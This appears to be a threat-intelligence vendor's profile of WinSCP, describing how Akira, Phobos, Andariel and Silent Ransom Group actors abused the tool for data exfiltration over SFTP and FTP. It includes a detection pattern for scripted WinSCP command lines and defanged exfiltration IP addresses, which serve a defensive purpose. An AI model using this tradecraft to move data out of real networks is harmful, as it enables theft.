WinSCP
WinSCP is a legitimate Windows file transfer utility (Windows Secure Copy) that supports SCP/SFTP and is repeatedly described in the content as being abused by threat actors for data exfiltration rather than as malware in its own right. The content links WinSCP to multiple intrusion sets and ransomware/extortion operations, including Akira affiliates, Phobos/8Base actors, DPRK RGB 3rd Bureau / Andariel (Onyx Sleet), and the Silent Ransom Group (Luna Moth/Chatty Spider/UNC3753). Reported use cases include exfiltration to external SFTP servers, FTP and other protocol-based transfers to actor-controlled infrastructure, and use alongside tools such as PuTTY, Rclone, FileZilla, WinRAR, Cloudflared, and Impacket. In Akira-related intrusions, actors used WinSCP to exfiltrate data to two external SFTP servers after staging archives with WinRAR, and WinSCP.exe was also listed as a tool IOC in SonicWall SSL VPN-related Akira activity. Additional reporting cited WinSCP/FileZilla as alternative exfiltration tooling in Akira and Fog intrusions. Phobos actors were specifically observed using WinSCP and Mega.io for file exfiltration. The Andariel advisory states the group has used PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via FTP and other protocols. The FBI reporting on Silent Ransom Group states the actors commonly exfiltrate stolen data using WinSCP or a hidden/renamed version of Rclone after gaining access through callback phishing and social engineering. High-confidence behavioral context in the content therefore characterizes WinSCP as dual-use software frequently leveraged for exfiltration over non-C2 protocols, especially SCP/SFTP over port 22, across ransomware, extortion, and espionage operations.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"...data exfiltration conducted through 'WinSCP' (Windows Secure Copy) or a hidden or renamed version of 'Rclone.'"
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
1 techniqueWinSCP executed with command-line arguments indicating scripted or automated file transfer. This catches both explicit protocol URLs (sftp://, ftp://, scp://) and command-mode operation (/command, /console, put).
Credential Access
1 techniqueIn several incidents, attackers harvested credentials stored by applications, including web browsers, file transfer clients (WinSCP, FileZilla), and remote management tools (mRemoteNG).
Lateral Movement
1 techniqueShortly after this tool was installed, the attacker connected to three VMware ESXi hosts via SSH over port 22.
Collection
1 techniqueMAZE Group 2/3 mappings include “T1039: Data from Network Shared Drive,” and narrative describes archiving data from corporate file shares.
Command and Control
2 techniquesSpike (> 1GB) in outbound SSH byte transfer activity to remote IP addresses T1048, T1071.002, T1021.004 WinSCP connections to 104.149.170[.]183:22 and 23.227.203[.]214:22
In some cases, SRG will run WinSCP or a disguised version of Rclone to scoop up files of interest.
Exfiltration
4 techniquesADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Once they've got access to the victim's device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption, using Windows Secure Copy (WinSCP) or a hidden or renamed version of 'Rclone'.
Для хищения данных Silent Ransom Group использует легитимные инструменты вроде WinSCP и Rclone, а также облачные сервисы, включая Google Drive и Microsoft OneDrive.
Для хищения данных Silent Ransom Group использует легитимные инструменты вроде WinSCP и Rclone, а также облачные сервисы, включая Google Drive и Microsoft OneDrive.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
WinSCP was used by Akira affiliates for SFTP-based data exfiltration and also appeared in comparative tooling differences across intrusions.
Legitimate SCP/SFTP client used to attempt data exfiltration over SSH (port 22) during the campaign.
Legitimate Windows SCP/SFTP client abused by the threat actors for data exfiltration from compromised environments.
Legitimate file transfer client abused for data exfiltration in support of extortion operations.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.